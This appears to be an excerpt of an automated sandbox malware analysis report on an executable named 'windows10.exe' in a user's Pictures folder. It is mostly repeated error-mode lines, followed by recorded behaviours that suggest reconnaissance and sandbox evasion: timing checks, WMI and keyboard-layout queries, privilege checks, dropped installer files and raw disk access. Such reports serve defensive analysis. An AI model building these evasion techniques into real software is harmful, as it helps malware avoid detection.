            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 5_2_00CBBF6F rdtsc 5_2_00CBBF6F
            Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5783.tmp
            Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI55AB.tmp
            Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5723.tmp
            Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5762.tmp
            Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5820.tmp
            Source: C:\Windows\Installer\MSI5DEF.tmp Check user administrative privileges: GetTokenInformation
            Source: C:\Windows\Installer\MSI5DCF.tmp Check user administrative privileges: GetTokenInformation
            Source: C:\Windows\Installer\MSI5DCF.tmp API coverage: 4.2 %
            Source: C:\Windows\Installer\MSI5DEF.tmp API coverage: 4.4 %
            Source: C:\Windows\System32\svchost.exe TID: 7768 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Installer\MSI5DCF.tmp Code function: 3_2_00B1069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00B1069D
            Source: C:\Windows\Installer\MSI5DEF.tmp Code function: 4_2_00B2069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00B2069D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_0097D08C FindFirstFileW,16_2_0097D08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 17_2_008FD08C FindFirstFileW,17_2_008FD08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe Code function: 16_2_0097DCF8 GetSystemInfo,16_2_0097DCF8
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational@
            Source: windows10.exe, 0000001E.00000003.2415217489.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416072475.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugowLMEM`8fm
